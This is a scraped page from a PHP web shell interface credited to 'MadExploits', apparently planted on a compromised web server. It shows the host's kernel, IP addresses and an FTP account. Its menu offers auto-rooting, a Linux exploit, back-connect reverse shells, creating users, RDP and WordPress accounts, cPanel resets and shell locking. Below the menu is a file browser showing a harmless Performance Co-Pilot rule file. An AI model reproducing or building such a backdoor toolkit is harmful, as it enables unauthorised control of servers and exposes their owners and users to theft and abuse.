Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.222
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
pcp /
pmieconf /
network /
[ HOME SHELL ]
Name
Size
Permission
Action
tcplistenoverflows
969
B
-rw-r--r--
tcpqfulldocookies
1.1
KB
-rw-r--r--
tcpqfulldrops
1.1
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : tcpqfulldocookies
#pmieconf-rules 1 # --- DO NOT MODIFY THIS FILE --- see pmieconf(5) # rule network.tcpqfulldocookies summary = "$rule$" enumerate = hosts predicate = "some_host ( network.tcp.reqqfulldocookies $hosts$ > 0 )" enabled = yes version = 1 help = "New socket connection attempts are being dropped because the SYN backlog queue is full and the kernel's built-in SYN flood prevention has kicked in. When the kernel is sending SYN cookies during normal operation it indicates that the rate of connections is probably too high for the default limits as SYN cookies are really only meant for mitigating SYN floods (see also tcpqfulldocookies and listenoverflows rules for additional details)."; string rule default = "TCP request queue full SYN cookie replies" modify = no display = no; string delta default = "2 min" help = "Sample interval between evaluations of this rule."; string action_expand default = "%v/sec@%h" display = no modify = no; string email_expand default = "host: %h request queue full SYNCOOKIE replies: %v%" display = no modify = no; # # --- DO NOT MODIFY THIS FILE --- see pmieconf(5)
Close